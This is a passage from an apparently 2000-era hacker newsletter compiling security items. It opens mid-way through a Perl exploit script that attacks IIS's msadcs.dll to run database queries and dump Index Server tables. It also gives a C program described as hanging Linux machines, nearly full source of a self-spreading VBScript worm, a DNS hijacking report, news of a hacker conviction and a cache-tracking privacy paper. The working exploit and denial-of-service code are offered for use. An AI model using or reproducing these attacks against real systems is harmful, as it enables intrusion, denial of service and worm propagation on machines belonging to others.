"$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; my $req; if (defined $args{c}){$req=3;} else {$req=6;} $reqlen=length( make_req($req,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req($req,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=("c","d","e","f","g"); my @dirs=("winnt","winnt35","winnt351","win","windows"); my $dir, $drive, $mdb; my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; foreach $drive (@drives) { foreach $dir (@sysdirs){ foreach $mdb (@sysmdbs) { print "."; if(create_table($drv.$drive.":\\".$dir.$mdb)){ if(run_query($drv . $drive . ":\\" . $dir . $mdb)){ print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit; }}}}} foreach $drive (@drives) { foreach $mdb (@mdbs) { print "."; if(create_table($drv.$drive.":".$mdb)){ if(run_query($drv.$drive.":".$mdb)){ print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit; }}}} } ############################################################################## sub hork_idx { print "\nAttempting to dump Index Server tables...\n"; print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/\x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{"$1$2"}="";} foreach $c (keys %d){ print "$c\n"; } } else {print "Index server not installed/query failed\n"; }} ############################################################################## sub dsn_dict { open(IN, "<$args{e}") || die("Can't open external dictionary\n"); while(){ $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n"; close(IN);} ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { # assume there's less than 500 headers if($in[$c] =~/^\x0d\x0a/){ if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } else { return $c+1; }}} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print "\nServer returned an ADO miscofiguration message\nAborting.\n"; exit;} if($error=~/A Handler is required/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;} if($error=~/specified Handler has denied Access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;} if($error=~/server has denied access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;}} ############################################################################## sub has_msadc { my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n"); my $base=content_start(@results); return if($results[$base]=~/Content-Type: application\/x-varg/); my @s=grep("^Server:",@results); if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" } else { print "/msadc/msadcs.dll was not found.\n";} exit;} ############################################################################## sub use_unc { $uncpath=$args{u}; $driverline="driver={Microsoft Access Driver (*.mdb)};dbq="; if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){ print "Your UNC path sucks. You need the following format:\n". "\\server(ip preferable)\share\some-file.mdb\n\n"; exit; } if(create_table($driverline.$uncpath)){ if(run_query($driverline.$uncpath)){ print "Success!\n"; save ("dbq=".$uncpath); exit;}} } ############################################################################## sub get_name { # this was added last minute my $msadc=<.,?]//g; print "Machine name: $results[$base+6]\n";} ############################################################################## # special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm, # #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and # good friends!), wiretrip, l0pht, nmrc & all of phrack # # thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice # # I wish I could really name everyone, but I can't. Don't feel slighted if # your not on the list... :) ############################################################################## @HWA 159.0 Hijack any .nu domain box (DoS/redirection/hijack) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source:http://packetstorm.securify.com/9902-exploits/domain.nu.DoS.txt Recent Submitted by: Internal Date: Sat, 20 Feb 1999 21:20:13 -0800 From: Shane Wegner To: BUGTRAQ@netspace.org Subject: Possible DOS attack in the .nu domain service Hello all, I am not sure if this is known or even relevant to the list and if not, please excuse this post. There appears to be a bug in the niu DNS setup process which could result in a DOS attack for those using their domains. For those unfamiliar with niu, they provide sub-domain service under the .nu domain to machines which do there own DNS. I have written to them on several occasions about this issue but as of yet have received no response. OK the bug is that any user who is willing to pay the $25 to register a .nu domain can knock out or redirect a host under another. This is best shown through an example. I register mycompany.nu and in the registration form enter the hosts I have doing the DNS for it. Name: mycompany.nu DNS1: machine.someserver.com DNS2: machine2.someserver.com After this step, my DNS entry in the .nu table looks like this $ORIGIN nu. mycompany IN NS machine2.someserver.com. IN NS machine2.someserver.com. mycompany.nu for the sake of this example had the following DNS table. $ORIGIN nu. mycompany IN SOA mymachine.mycompany.nu. hostmaster.mycompany.nu. ( 1 301 120 604800 600 ) IN NS machine1.someserver.com. IN NS machine2.someserver.com. $ORIGIN mycompany.nu. mymachine IN A 192.168.1.1 So Al's well until someone registers evil.nu with the goal of knocking out myserver.mycompany.nu. On the form, they enter the following. name: evil.nu DNS1: mymachine.mycompany.nu DNS1IP: 127.0.0.1 Now here's the bug, if you enter an IP for a machine which falls under the .nu name-space, it maps it statically. It does not check to see if it falls under your name-space. Therefore, our evil.nu entry in the .nu table looks like this. $ORIGIN nu. evil IN NS mymachine.mycompany.nu. $ORIGIN mycompany.nu. mymachine IN A 127.0.0.1 So the IP for mymachine.mycompany.nu has been redirected from its 192.168.1.1 to 127.0.0.1. An attacker could conceivably redirect the mail servers of a company to his own machine or anything to that effect. Regards, Shane -- Shane Wegner: shane@cm.nu Tel: (604) 930-0530 Sysadmin, Continuum Systems: http://www.cm.nu Personal website: http://www.cm.nu/~shane ICQ UIN: 120000 PGP: keyid: 2048/F5C2BD91 Fingerprint: 8C 48 B9 D8 53 BB D8 EF 76 BB DB A2 1C 0D 1D 87 @HWA 160.0 The dreaded and most pheared return of the infamous GOAT! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by Debris From the new website: note: this text has been modified from its' original form, it has been formatted to fit your screen. - Ed http://www.goat-advisory.org/ January 1998, an EFNET channel was created, #feed-the-goats. From that emerged a webpage, http://goat.sphix.com. The purpose of that page was to mock, satirize and piss off the 'underground community'. As we grew in popularity, people who were NOT members began defacing websites under the fair name of g0at. Goat security then created a hoax where it was believed, yahoo was cracked. Goat security's popularity skyrocketted after such incidents. Text files, code and advisories were created daily and the archive became rather plentiful, however, problems arose which are described in g0at-quit.txt leading to the end of g0at. The press release states that g0at security will never return. Well it is time to anule that. G0at security has returned. For many monthes people have been begging for the return of g0at security. We have finally caved in. We are in the process of salvaging old text files, images etc... If you have anything created by us, please visit #feed-the-goats key: blaq, immediatly and speak with Debris. The 'underground community' has fallen apart. The clueless run amock and give people with direction, goals, and knowledge, a bad name to the general public. The media has the absolute wrong impression of 'hackers' as you most likely have heard many rant about before (I will not bore you with IRC politics/drama). G0at security is back to start up where we left off. Lightening up the world and spreading joy while pissing most people off. We are not a defacing group, a ./hacking group or anything else similar to that. Do not bug us with question pertaining to this. We want nothing to do with this other then mocking it. Coming soon: Various new text files, new members, new webdesign, archive of salvaged material. debris@total.net -=- http://www.hackernews.com/defaced/1999/yahoo0399/ Original quit text: /////////////////////////////////////////// GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT G O O A A TT G GGG O O AAAAAAAA TT G G O O A A TT GGGGGG OOOOOOO A A TT \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Due to recent events, the downfall of g0at security has become imminent. These incidents include: - Legal problems of some of our members. - Recent hacking crack downs launched by many governments. - The recent takeover of our channel, #feed-the-goats (Efnet). - Losing our server due to a sloppy hack by one of our members (/me looks away). - Losing our text files due to our domain being wiped off the server. - Fights and dissapearances of some of our members. - The maturing of our members. g0at security hereby announces it's closure. By this we do not mean we are going legit, we are finished. Unlike other groups we most likely will not spawn back. [Brief history of g0at security] One day in Feb. I believe, ech0 and myself (Debris), decided to irc. ech0 informed me that occasionally hung out in a channel he, himself created called #feed-the-goats. From there, members of a popular group, HcV along with members of Global Hell, began coming. ech0 and myself decided that we wanted to be as elite as our peers in #rootworm, so we made a webpage. The purpose of the page was to mock and satirize hacker culture in general. Our first document entitled "g0at declares war on LoU" mocked the Legion of the Underground's new attempt at becoming legit among a handful of other aspects of their organization. Our original url (goat.sphix.com) quickly grew in size and popularity, and our channel became more populated. The hacks began soon after, some by members and a lot by non-members. g0at's highpoint came soon after the controversial yahoo hack. Our popularity skyrocketted and the name g0at became known to all (unfortunatly we got all the l33t0s in our channel and wouldn't go away). The fun and games continued up until April, when all the 'incidents' began. Then May was the last straw. [Where do we go from here] Most members will most likely go their own ways. Many still hang in #feed-the-goatz (our new channel). No more text releases will come from g0at, our webpage will remain down, our archive on attrition.org will stay the same and nothing will be heard of us as a group. [Thanks and greets] Thanks to all that supported our group and enjoyed the text we wrote to amuse the unintelligent. Greets to all our 12 members, HNN, attrition, net-security, HWA.hax0r.news. JP, for entertaining us for hours with your hacker journalism. And thanks to all the rest. Finally.... it's been fun. It's been awesome being associated with g0at. You can still reach us at g0at@attrition.org for further questions or comments or whatever (I just want email) g0at---------------------------------------------------------------------- []=Debris=[] debris@attrition.org @HWA 161.0 b0f: exploit code to hang any linux machine by eth0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ b0f now has its own section on PSS, only a few files are currently hosted but we expect the library will be updated in the future. http://packetstorm.securify.com/advisories/b0f/ /* [http://b0f.morphed.net] - eth0 */ /* */ /* Vulnerable Linux 2.2.12 Linux 2.2.13 Linux 2.2.14 Linux 2.3.99-pre2 The following exploit code will hang any Linux machine on various Pentium platforms. Note that this does not require any special privileges, and any user can compile and run it, so watch out kiddies... The send system call immediately puts the kernel in a loop spewing kmalloc: Size (131076) too large forever (or until you hit the reset button). Apparently UNIX domain sockets are ignoring the /proc/sys/net/core/wmem_max parameter, despite the documentation to the contrary. [code provided by eth0 from b0f security] [information provided by Jay Fenlason] [http://b0f.morphed.net] [buffer0verfl0w security] */ #include #include #include char buf[128 * 1024]; int main ( int argc, char **argv ) { struct sockaddr SyslogAddr; int LogFile; int bufsize = sizeof(buf)-5; int i; for ( i = 0; i < bufsize; i++ ) buf[i] = ' '+(i%95); buf[i] = '\0'; SyslogAddr.sa_family = AF_UNIX; strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) ); LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 ); sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) ); return 0; } @HWA 162.0 HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian The National Infrastructure protection Center has identified a new self replicating script (hmmm, they don't call it a virus?). The Alert issued by NIPC says that the new script will erase hard drives and dial 911 emergency systems. The script seems to only effect systems running Windows that are setup with file and print sharing. NIPC ZD Net Symantic Network Associates PC Help http://www.nipc.gov/nipc/advis00-038.htm http://www.zdnet.com/zdnn/stories/news/0,4586,2504397,00.html?chkpt http://www.symantec.com/avcenter/venc/data/bat.chode.worm.html http://vil.nai.com/vil/wm98557.asp http://pc-help.org/news/scriptworm.htm ---------- NIPC (Gotta love their melodramatic all-caps eh? heh -Ed) SUBJECT: NATIONAL INFRASTRUCTURE PROTECTION CENTER INFORMATION SYSTEM ADVISORY (NIPC ADVISORY 00-038); SELF-PROPAGATING 911 SCRIPT 1. A RECENT AND BREAKING FBI CASE HAS REVEALED THE CREATION AND DISSEMINATION OF A SELF-PROPAGATING SCRIPT THAT CAN ERASE HARD DRIVES AND DIAL-UP 911 EMERGENCY SYSTEMS. WHILE INVESTIGATION AND TECHNICAL ANALYSIS CONTINUE, THE SCRIPT APPEARS TO INCLUDE THE FOLLOWING CHARACTERISTICS: A. ACTIVELY SEARCH THE INTERNET FOR COMPUTER SYSTEMS SET UP FOR FILE AND PRINT SHARING AND COPY ITSELF ON TO THESE SYSTEMS. B. OVERWRITE VICTIM HARD DRIVES. C. CAUSE VICTIM SYSTEMS TO DIAL 911 (POSSIBLY CAUSING EMERGENCY AUTHORITIES TO CHECK OUT SUBSTANTIAL NUMBERS OF "FALSE POSITIVE" CALLS). 2. TO THIS POINT CASE INFORMATION AND KNOWN VICTIMS SUGGEST A RELATIVELY LIMITED DISSEMINATION OF THIS SCRIPT IN THE HOUSTON, TEXAS AREA, THROUGH SOURCE COMPUTERS THAT SCANNED SEVERAL THOUSAND COMPUTERS THROUGH FOUR INTERNET SERVICE PROVIDERS (AMERICA ON-LINE, AT&T, MCI, AND NETZERO). DISSEMINATED SCRIPT MAY BE PLACED IN HIDDEN DIRECTORIES NAMED CHODE, FORESKIN OR DICKHAIR. FURTHER SCRIPT ANALYSIS BY THE FBI/NIPC CONTINUES. 3. FBI/NIPC REQUESTS RECIPIENTS IMMEDIATELY REPORT INFORMATION RELATING TO USE OF THIS SCRIPT TO THE LOCAL FBI OR FBI/NIPC WATCH AT 202-323-3204/3205/3206. AS MORE TECHNICAL OR OPERATIONAL INFORMATION ABOUT THIS SCRIPT DEVELOPS, NIPC WILL DISSEMINATE THIS INFORMATION THROUGH THE CARNEGIE MELLON CERT, ANTIVIRUS VENDORS OR ITS OWN WEB SITE (www.nipc.gov), AS APPROPRIATE. -=- pc-help; VBScript Worm Infects Open Shares Thursday, 24 February 2000 While inspecting a client's misbehaving computer this evening, I found a little surprise. His StartUp group contained a Visual Basic script which on inspection proved to be a rather simple, self-replicating and self-transmitting worm. The client's system had a shared C: drive with no password, cause unknown. The worm had either been placed on his system (no evidence so far of a trojan but we've yet to do thorough scans) or it had arrived by reason if its own action. How It Works The script resides in the StartUp group of the Start Menu and is therefore run at each reboot. The filename is NETWORK.VBS. The script creates a log file, C:\NETWORK.LOG, which it erases and re-creates upon each new execution. The script generates a random Class C subnet address and enters it in the log. This address is the first three numbers of the usual four-part IP address. It then steps thru all 255 addresses in that subnet. It blindly attempts to map a shared C: drive at the remote address to local drive letter J: at each address in turn. It checks each time to verify the successful creation of a drive J: on its host. If it has not connected, it repeats the process at the next address in sequence. When it has stepped thru all 255 addresses of the current subnet, it creates another random subnet address, enters it in NETWORK.LOG, and continues attempting connections on the new subnet. If it succeeds in mapping a remote drive, the script then attempts to copy itself to a series of likely locations on that drive. Its first act is to place a copy of itself in the root directory of drive J:. If the file makes the journey, the script logs its success. Then it copies itself to the following folders, most of them targeting the StartUp group which will cause persistent execution of the script at every reboot: j:\windows\startm~1\programs\startup\ j:\windows\ j:\windows\start menu\programs\startup\ j:\win95\start menu\programs\startup\ j:\win95\startm~1\programs\startup\ j:\wind95\ The script then disconnects, effectively removing drive J:. It then goes back to work "scanning" addresses without cease. Incidentally, if the host system has a drive using the letter J: the script will fail to propagate. Here are the contents of NETWORK.LOG as found on my client's system: Log file Open Subnet : 211.203.133.0 Subnet : 203.251.228.0 Subnet : 201.244.147.0 Subnet : 204.97.180.0 This particular log reflects the fact that the worm had no success transferring itself during its last session. The system had been rebooted about two hours or so before, and had been offline most of that time. The script had tried only about 1000 addresses in that period. This small number was presumably because of the delay, usually about 10 seconds, resulting from a connection attempt to a nonexistent host. The Script My analysis is in blue text. Note: A single small alteration of this code renders it impotent. The remainder has been left intact for the benefit of well-intentioned readers. dim octa dim octb dim octc dim octd dim rand dim dot dim driveconnected dim sharename dim count dim myfile // Creates a bunch of variables. count = "0" dot = "." driveconnected="0" set wshnetwork = wscript.createobject("wscript.network") Set fso1 = createobject("scripting.filesystemobject") set fso2 = createobject("scripting.filesystemobject") // Sets a bunch of variables. on error resume next randomize checkfile() // Erases and then re-creates its log file, c:\network.log. randaddress() // Generates a random Class C subnet address (that's a block of 255 addresses). checkaddress() // Increments the IP address by one; and creates a new random subnet if this one's been covered. shareformat() // Creates a textstring, using the current IP address, which will be used to map a shared drive. wshnetwork.mapnetworkdrive "j:", sharename // Maps the shared drive to J:, blindly assuming there's one at the address. enumdrives() // Checks to see if it's successfully mapped the drive. copyfiles() // Places a copy of itself in several places on the drive (someone else's machine someplace). disconnectdrive() // Drops the connection. msgbox "Done" function disconnectdrive() wshnetwork.removenetworkdrive "j:" driveconnected = "0" end function function createlogfile() Set myfile = fso1.createtextfile("c:\network.log", True) end function function checkfile() If (fso1.fileexists("c:\network.log")) then fso1.deletefile("c:\network.log") createlogfile() else createlogfile() end If myfile.writeLine("Log file Open") end function function copyfiles() myfile.writeline("Copying files to : " & sharename) Set fso = CreateObject("scripting.filesystemobject") fso.copyfile "c:\network.vbs", "j:\" If (fso2.FileExists("j:\network.vbs")) Then myfile.writeline("Successfull copy to : " & sharename) End If fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\" fso.copyfile "c:\network.vbs", "j:\windows\" fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\" fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\" fso.copyfile "c:\network.vbs", "j:\wind95\" end function function checkaddress() octd = octd + 1 if octd = "255" then randaddress() end function function shareformat() sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C" end function function enumdrives() Set odrives = wshnetwork.enumnetworkdrives For i = 0 to odrives.Count -1 if sharename = odrives.item(i) then driveconnected = 1 else ' driveconnected = 0 end if Next end function function randum() rand = int((254 * rnd) + 1) end function function randaddress() if count > 50 then octa=Int((16) * Rnd + 199) count=count + 1 else octa="255" end if randum() octb=rand randum() octc=rand octd="1" myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0") end function Why did I publish this code? Comments This is the first worm I've seen that was targeted to take advantage of open (sans password) shares. I have no idea whether similar exploits exist nor whether anyone else has spotted this particular creature. (25 Feb: I now know that this worm has been known to AV vendors for several days. Most of them have issued patches for its detection.) In my opinion, any working copy of this worm is almost certain to replicate itself on several other machines before it's detected by the user, so it is probably spreading at a steady -- perhaps even exponential -- rate. It's impossible to estimate the incidence of open shares with certainty; but I've poked around looking for them a time or two in an effort to estimate them; so I think I can hazard an educated guess. I'd say one or two addresses in a thousand harbor a system with open shares, and a significant percentage of those will permit access to the entire C: drive. While online this worm might easily scan several thousand potential victims in the course of a few hours, which means that an undetected worm residing on a system that's online several hours a day has a high probability of replicating itself something like once every day or two. The capability to run these scripts is installed with Internet Explorer 5. I'm not sure about IE4. I believe this means that Win98 systems are much more likely than Win95 machines to have the Windows Script Host installed. So the script won't run on a significant proportion of the "legacy" systems which were more easily misconfigured for open shares. This could reduce its rate of propagation. 25 Feb: UseNet reports indicate that this worm can cause slowdowns on a LAN. It stands to reason! As reported by NAI at http://vil.nai.com/vil/vbs98477.asp, the effect of the worm's simultaneous action on numerous systems on a network may overload or crash servers which receive a flood of DNS requests resulting from the script's activity. Note that in systems with Windows Script Host installed, there will be a file named NETWORK.VBS in the Windows directory. Don't be alarmed. This is a harmless sample script. If you're infected, the bad guy will be in the StartUp folder and in the root directory. Removal To kill the script, move it out of the StartUp folder and reboot. If Windows won't allow this, reboot to MS-DOS (don't just open a DOS window) and type this command: ren \windows\startm~1\programs\startup\network.vbs network.txt Hit Enter. If no error message displays, it worked. Now when you restart Windows, the script will not run, instead it will open up for examination in Notepad. If it's not identical to the one I've quoted above, I'd appreciate it if you'd send me a copy. In Sum The worm script does nothing nefarious aside from taking up bandwidth on the Net link and consuming some processing power on the host system. But it may have been responsible for some annoying lockups that were observed on my client's system. Fortunately it doesn't phone home, nor otherwise serve to advertise the victim's open shares. But it could easily do so with simple additions. So it illustrates a rather serious potential for exploit. In fact, given history, I consider it a positive certainty that more hostile versions of this thing will appear. A worm like this with phone-home or broadcast features might spread far and wide, and report on open shares on a huge scale. It would probably lay a lot of people open to near-certain intrusion. It should stand as a grim reminder of the potential seriousness of open shares. Anyone who simply ensures they're not sharing their entire C: drive with write permission on the Internet link has nothing to fear from this worm. If it writes to a shared subdirectory or to another drive, it won't run. For more on open shares and their solutions, see my page titled File And Printer Sharing And The Internet. I am suddenly very interested in this sort of scripting. If you too would like to investigate it in greater detail, here are some useful links: @HWA 163.0 HNN:Apr 3rd:Mixter Convicted of "Computer Sabotage" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by g.machine() The district court of Hannover Germany has sentenced the creator of Tribe Flood Network, the tool allegedly used in the recent massive DDoS attacks, to 6 six months youth punishment on probation. Mixter was accused of "computer sabotage" and "spying on data". However, the trial had nothing to do with the recent attacks on major internet sites, such as CNN or eBay, Mixter was sentenced due to a felony that happened two years ago. In 1998 he repeatedly broke into several company systems and spied on their data. Heise - German Yahoo News - German http://www.heise.de/newsticker/data/pab-31.03.00-000/ http://de.news.yahoo.com/000331/33/o0fp.html ---------- Freitag März 31, 2:53 PM Jugendstrafe für bekannten Computer-Hacker «Mixter» Hannover (dpa) - Der bekannte Hacker «Mixter» ist in Hannover zu einer Jugendstrafe von sechs Monaten auf Bewährung verurteilt worden. Der 21-Jährige habe mit Computersabotage «beträchtlichen Schaden» angerichtet, heißt es im Urteil. Bekannt wurde «Mixter» nach den jüngsten Hacker-Angriffen auf amerikanische Internet-Firmen. Er hatte das dafür benutzte Programm TFN erstellt. Damit wurden das Internet- Portal Yahoo, der Online-Aktienhändler E*Trade, der Buchhändler Amazon.com und der Nachrichtendienst CNN.com stundenlang lahm gelegt. -=- Babelfishes almost English version: In English: (Well sorta) heh Friday March 31, 2:53 PM Youth punishment for well-known computer hacker " Mixter " Hanover (dpa) - the well-known hacker " Mixter " was condemned in Hanover to a youth punishment by six months on probation. The 21-Jaehrige caused, is called considerable damage " with computer sabotage " it in the judgement. Admits became " Mixter " after the recent hacker attacks on American Internet companies. It had prepared the program TFN used for it. Thus the Internet portal Yahoo, the on-line stock broker E*Trade, the bookseller Amazon.com and the intelligence service NCN.com were for hours lamely put. @HWA 164.0 HNN:Apr 3rd:Forget Cookies, Worry About Cache ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime Those of us who place a high value on our privacy usually have cookies turned off within our browsers. However web sites can still track you visits by looking at your cache. Web sites are able to check HTTP cache-control headers such as If-Modified-Since to track individual users. Linux Care http://www.linuxcare.com.au/mbp/meantime/ ---------- meantime: non-consensual http user tracking using caches From WordNet (r) 1.6 [wn]: mean 2: characterized by malice; "a hateful thing to do"; "in a mean mood"; "told spiteful stories about the fat lady" [syn: {hateful}, {spiteful}] 3: having or showing a meanspirited lack of honor or morality; 4: (slang) excellent; "famous for a mean backhand" time 5: the continuum of experience in which events pass from the future through the present to the past executive summary HTTP cache-control headers such as If-Modified-Since allow servers to track individual users in a manner similar to cookies, but with less constraints. This is a problem for user privacy against which browsers currently provide little protection. introduction Some people would like to be anonymous as they use the web, and other people would like to prevent anonymous access for various reasons. Consider, for example, an internet marketing company that wants to chain together visits to various web sites by a user so as to build a fuller profile of their interests and usage patterns. Conversely, a web user might not wish to leak such information to a site because they are looking at controversial information, desire a good negotiating position, or see privacy as a moral right. An arms race in techniques for providing and stripping away anonymity has developed over the years. This black paper discusses what is believed to be a new technique for tracking clients and possible responses. problem statement Alice is browsing the web; Bob runs a number of otherwise-unrelated web servers. Alice makes several requests to Bob's servers over time. Bob would like to tie together as many as possible of the requests made by Alice to learn more about Alice's usage patterns and identity: we call this identifying the request chain. Alice would like to access Bob's servers but not give away this information. There are many perfectly good reasons why in a particular situation B might want to know A's identity, or at least a unique pseudonym. If B explains the reasons why tracking is required, then A can consent to and allow tracking in various ways. There are several less savory possibilities when A does not consent to the tracking or does not realize that a single chain can be found across apparently unrelated servers controlled by B. The scenario poses an interesting information-theory and game-theory challenge in anonymity. It is also immediately practical: there is a good deal of development being done in aid of both Alice and Bob. existing approaches cookies The standard approach for associating user requests across several responses is the HTTP `Cookie' state-management extension. The Cookie response header allows a server to ask the client to store arbitrary short opaque data, which should be returned for future requests of that server matching particular criteria. Cookies are commonly used to store per-user form defaults, to manage web application sessions, and to associate requests between executions of the user agent. The user agent always has the option to just ignore the Set-Cookie response header, but most implementations default to obeying it to preserve functionality. Cookies can optionally specify an expiry time after which they should no longer be used, that they should persist on disk between client session, or that they should only be passed over transmission-level-secure connections. The privacy implications of cookies have been extensively discussed, and several problems have been found and recitified in the past. One example of privacy compromise through cookies is the use of cookies attached to banner images downloaded from a central banner server: the same cookie is used within images linked from several servers, and so the user can be tracked as they move around. other approaches An obvious means to associate requests is by source IP address. Over the short term this will generally work quite well, as a client is likely to use a single IP address during a browsing session. Even then it is complicated by proxies acting for multiple clients, network address translation, or multiuser machines. Over a longer term, the information is convolved by dynamically-assigned IPs, mobile computers moving between networks, dialup pools and the like. Indeed, cookies were proposed in large part to allow legitimate stateful applications to cope with the impossibility of uniquely identifying users by IP address. Within a single site, state may be maintained by generating dynamic URLs that include session identification either within the hostname (http://d9128309812.crackmonkey.org/) or path (http://crackmonkey.org/d213213213/faq.html). However, this does not allow tracking between sites and causes a significant loss of functionality because URLs cannot be shared between users or bookmarked. Single links can be identified by the HTTP Referer header. There are some limitations here, however: this only identifies the immediately preceding resource, and the link is lost if the user re-enters a URL by hand or retrieves it from a bookmarks file. countermeasures Users caring to preserve their privacy have taken various countermeasures against these techniques. To reassure end-users about cookie privacy issues, user agents such as Netscape Navigator, Microsoft Internet Explorer and Lynx allow the user some control. The most basic control is to enable or disable cookies altogether; some user agents allow this to be specified for particular domains. There may be more fine-grained controls, such as only accepting cookies from the same server as the top-level page currently viewed and not from servers for subsidiary requests such as images or frames. The broadest protection is afforded by the use of a proxy local to the browsers machine, such as Internet Junkbuster. This software rewrites the request to strip out identifying browser and cookie information, in addition to attempting to remove advertising banners. Various proxying solutions are available to prevent identification by IP address, such as anonymizer.com and CROWDS. A similar but more powerful attack is possible through the cache-management headers proposed in draft-mogul-http-delta-02. caching in http To make access faster and reduce network usage, browsers generally keep a copy of resources such as pages and images that they download. When a client has a cached copy of a page, it can decide either to use the cached copy as is, or to send a request to the server to check that it is up-to-date. When the client sends a request for the copy it has in cache, it sends a conditional request describing the cached copy and asking the server to only transfer the body of the resource if it is newer than the cached copy. The most common means of checking this currently in use is the Last-Modified date header. The server supplies a date in the metadata of the response, and the client returns the same date when sending a conditional request. Other techniques, such as checking the length of the resource body, its MD5 hash, and a unique ETag cookie have also been used. the meantime exploit The fundament of the meantime exploit is that the server wishes to `tag' the client with some information that will later be reported back, allowing the server to identify a chain. Cookies are a good approach to this, but their privacy implications are well known and so Bob requires a more surreptitious approach. The HTTP cache-control headers are perfect for this: the data is provided by the server, stored but not verified by the client, and then provided verbatim back to the server on the next matching request. Two headers in particular are useful: Last-Modified and ETag. Both are designed to help the client and server negotiate whether to use a cached copy or fetch the resource again. The general approach of meantime is that rather than using the headers for their intended purpose, Bob's servers will instead send down a unique tag for the client. Last-Modified is constrained to be a date, and therefore is somewhat inflexible. Nevertheless, the server can reasonably choose any second since the Unix epoch, which allows it to tag on the order of one billion distinct clients. ETag allows an arbitrary short string to be stored and passed. It is not so commonly implemented in user agents at the moment, and so not such a good choice. In both cases the tag will be lost if the client discards the resource from its cache, or if it does not request the exact same resource in the future, or if the request is unconditional. (For example, Netscape sends an unconditional response when the user presses Shift+Reload.) Bob has less control over this than he has with cookies, which can be instructed to persist for an arbitrarily long period. The date is only sent back for the exact same URL, including any query parameters. By contrast, cookies can be returned for all resources in a site or section of a site. This makes Bob's job a little harder. Bob therefore should make sure that all pages link to a small common resource: perhaps a one-pixel image. This image is generated by a script that supplies and records a unique timestamp to each client, and records whatever is already present. intermediate proxies. The presence of proxy caches between the client and the server will complicate the situation for Bob, because if the proxy holds a copy of the resource it might satisfy the request locally or change the cache control criteria. In the extreme case, if the proxy does all the caching and the client none, then Bob will identify all requests through that proxy as a single chain. Bob need not despair. Proxy usage is still quite low, and there are some indications that people concerned about anonymity will not route their requests through a proxy that might log them. In fact, a meantime exploit is entirely possible if Bob controls an intermediate proxy. This seems not to be so much of a threat in practice, however, because proxies are most commonly controlled by the administrators of a local network who already have considerable power to trace users. If intermediate proxies or clients implement expiry heuristics then this can interfere with tracking, but not irredeemably so. demonstration This very simple demonstration places a tag in your browser's cache, and allows you to associate a short string with it on on our server. It should persist as long as the record remains in your browser's cache. If there are several caches on your system, perhaps for different use profiles, or for different user agents, then each will get one tag. It will not be confused by other people accessing the system from the same machine, by use of different IP addresses, or by cookies being disabled. The demonstration will be easier to understand if your browser is set to `Cache is compared to network on every request'. If that setting is not checked, your access will still be tracked but the fields of the page may not seem to update. This will not work in Lynx. track me source code results This code is a demonstration of the principle, rather than a full implementation of tracking. Nevertheless: It works quite reliably against Netscape. Lynx apparently never sends conditional requests, and so is 